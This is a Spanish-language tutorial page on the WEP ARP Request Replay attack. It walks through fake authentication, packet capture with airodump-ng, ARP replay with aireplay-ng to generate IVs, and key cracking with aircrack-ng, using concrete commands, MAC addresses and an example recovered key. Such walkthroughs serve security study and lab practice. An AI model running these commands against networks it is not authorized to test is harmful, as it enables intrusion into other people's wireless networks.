Page cover

🌐ARP Request Replay

Quedamos a la espera de un paquete ARP y luego lo retransmite al AP y así el AP retransmite el paquete ARP generando múltiples IVs

Debemos ejecutar esta técnica hasta lograr los suficientes IVs para crackear la llave

1. Partimos de un Fake Auth

🌐Fake Autentication

2. Iniciar airodump-ng

Debemos guardar la salida con --write

# 4 - Iniciamos airodump-ng y guardamos la salida
sudo airodump-ng --bssid 00:E0:4C:6A:5A:F8 --channel 11 --write arp_rr wlan0

Observamos que hay muy poco tráfico en la red

3. aireplay --arpreplay

sudo aireplay-ng --help

Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
   >> --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)
sudo aireplay-ng --arpreplay -b <SSID-OBJETIVO> -h <MAC-ADAPTADOR> <INTERFAZ> 
sudo aireplay-ng --arpreplay -b 00:E0:AC:6A:5A:F8 -h E8:4E:06:35:A9:C0 wlan0mon 

Volviendo a airodump vemos que hemos aumentado correctamente el tráfico de red

4. Iniciar aircrack-ng

Abrir el archivo .cap

sudo aircrack-ng arp_rr.cap
KEY FOUND! [12:34:56:78:90]
Password: 1234567890

Última actualización

¿Te fue útil?